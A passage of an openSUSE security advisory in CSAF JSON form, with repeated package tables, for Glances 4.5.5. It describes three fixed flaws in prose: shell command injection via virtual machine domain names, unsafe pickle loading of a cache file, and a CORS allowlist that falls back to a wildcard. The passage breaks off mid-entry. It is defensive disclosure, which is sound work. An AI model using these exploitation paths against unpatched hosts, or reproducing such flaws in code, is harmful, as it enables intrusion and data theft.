| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — | — | Vendor Fix |
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — | — | Vendor Fix |
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — | — | Vendor Fix |
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "glances-common-4.5.5-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the glances-common-4.5.5-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-11122",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_11122-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46606 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46606/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46607 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46607/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46608 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46608/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46611 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46611/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-53925 page",
"url": "https://www.suse.com/security/cve/CVE-2026-53925/"
}
],
"title": "glances-common-4.5.5-1.1 on GA media",
"tracking": {
"current_release_date": "2026-06-25T00:00:00Z",
"generator": {
"date": "2026-06-25T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:11122-1",
"initial_release_date": "2026-06-25T00:00:00Z",
"revision_history": [
{
"date": "2026-06-25T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.aarch64",
"product": {
"name": "glances-common-4.5.5-1.1.aarch64",
"product_id": "glances-common-4.5.5-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.aarch64",
"product": {
"name": "python311-Glances-4.5.5-1.1.aarch64",
"product_id": "python311-Glances-4.5.5-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.aarch64",
"product": {
"name": "python313-Glances-4.5.5-1.1.aarch64",
"product_id": "python313-Glances-4.5.5-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.aarch64",
"product": {
"name": "python314-Glances-4.5.5-1.1.aarch64",
"product_id": "python314-Glances-4.5.5-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.ppc64le",
"product": {
"name": "glances-common-4.5.5-1.1.ppc64le",
"product_id": "glances-common-4.5.5-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.ppc64le",
"product": {
"name": "python311-Glances-4.5.5-1.1.ppc64le",
"product_id": "python311-Glances-4.5.5-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.ppc64le",
"product": {
"name": "python313-Glances-4.5.5-1.1.ppc64le",
"product_id": "python313-Glances-4.5.5-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.ppc64le",
"product": {
"name": "python314-Glances-4.5.5-1.1.ppc64le",
"product_id": "python314-Glances-4.5.5-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.s390x",
"product": {
"name": "glances-common-4.5.5-1.1.s390x",
"product_id": "glances-common-4.5.5-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.s390x",
"product": {
"name": "python311-Glances-4.5.5-1.1.s390x",
"product_id": "python311-Glances-4.5.5-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.s390x",
"product": {
"name": "python313-Glances-4.5.5-1.1.s390x",
"product_id": "python313-Glances-4.5.5-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.s390x",
"product": {
"name": "python314-Glances-4.5.5-1.1.s390x",
"product_id": "python314-Glances-4.5.5-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.x86_64",
"product": {
"name": "glances-common-4.5.5-1.1.x86_64",
"product_id": "glances-common-4.5.5-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.x86_64",
"product": {
"name": "python311-Glances-4.5.5-1.1.x86_64",
"product_id": "python311-Glances-4.5.5-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.x86_64",
"product": {
"name": "python313-Glances-4.5.5-1.1.x86_64",
"product_id": "python313-Glances-4.5.5-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.x86_64",
"product": {
"name": "python314-Glances-4.5.5-1.1.x86_64",
"product_id": "python314-Glances-4.5.5-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64"
},
"product_reference": "glances-common-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le"
},
"product_reference": "glances-common-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x"
},
"product_reference": "glances-common-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64"
},
"product_reference": "glances-common-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64"
},
"product_reference": "python311-Glances-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le"
},
"product_reference": "python311-Glances-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x"
},
"product_reference": "python311-Glances-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64"
},
"product_reference": "python311-Glances-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64"
},
"product_reference": "python313-Glances-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le"
},
"product_reference": "python313-Glances-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x"
},
"product_reference": "python313-Glances-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64"
},
"product_reference": "python313-Glances-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64"
},
"product_reference": "python314-Glances-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le"
},
"product_reference": "python314-Glances-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x"
},
"product_reference": "python314-Glances-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
},
"product_reference": "python314-Glances-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-46606",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46606"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances KVM/QEMU monitoring engine (glances/plugins/vms/engines/virsh.py) passes VM domain names, read directly from virsh list --all output, into f-string command templates that are processed by secure_popen(). secure_popen() is explicitly designed to interpret \u0026\u0026, |, and \u003e as shell operators, so a domain name that contains one of them is split and the remainder is run as an additional command. Because domain names are never sanitised before interpolation, any user with the ability to create or rename a KVM/QEMU virtual machine - a libvirt privilege that need not come with a shell account on the hypervisor - can execute arbitrary commands as the OS user running Glances - commonly root on hypervisor hosts. The same secure_popen() operator handling is reachable through glances.conf as CVE-2026-53925, which this advisory also covers. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46606",
"url": "https://www.suse.com/security/cve/CVE-2026-46606"
},
{
"category": "external",
"summary": "SUSE Bug 1268800 for CVE-2026-46606",
"url": "https://bugzilla.suse.com/1268800"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-46606"
},
{
"cve": "CVE-2026-46607",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46607"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, glances/outdated.py uses pickle.load() to read a version-check cache file stored at a predictable, world-accessible path (~/.cache/glances/glances-version.db or $XDG_CACHE_HOME/glances/glances-version.db). No integrity check, signature verification, or format validation is performed before deserialization. An attacker with write access to that path - through any of several realistic local or container-level scenarios - can plant a malicious pickle file and achieve arbitrary code execution as the OS user running Glances the next time it starts with version checking enabled (the default). This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46607",
"url": "https://www.suse.com/security/cve/CVE-2026-46607"
},
{
"category": "external",
"summary": "SUSE Bug 1268854 for CVE-2026-46607",
"url": "https://bugzilla.suse.com/1268854"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-46607"
},
{
"cve": "CVE-2026-46608",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46608"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s) introduced a configurable CORS origin list in version 4.5.3 as a mitigation for CVE-2026-33533. However, the implementation silently falls back to Access-Control-Allow-Origin: * whenever cors_origins contains more than one entry. An operator who configures an explicit two-entry allowlist (e.g. two internal dashboard origins) intending to restrict browser access instead receives the unrestricted wildcard. A malicious web page served from any origin can issue a CORS simple request to /RPC2 and read the full system monitoring dataset without the victim\u0027s knowledge. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46608",
"url": "https://www.suse.com/security/cve/CVE-2026-46608"
},
{
"category": "external",
"summary": "SUSE Bug 1268855 for CVE-2026-46608",
"url": "https://bugzilla.suse.com/1268855"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
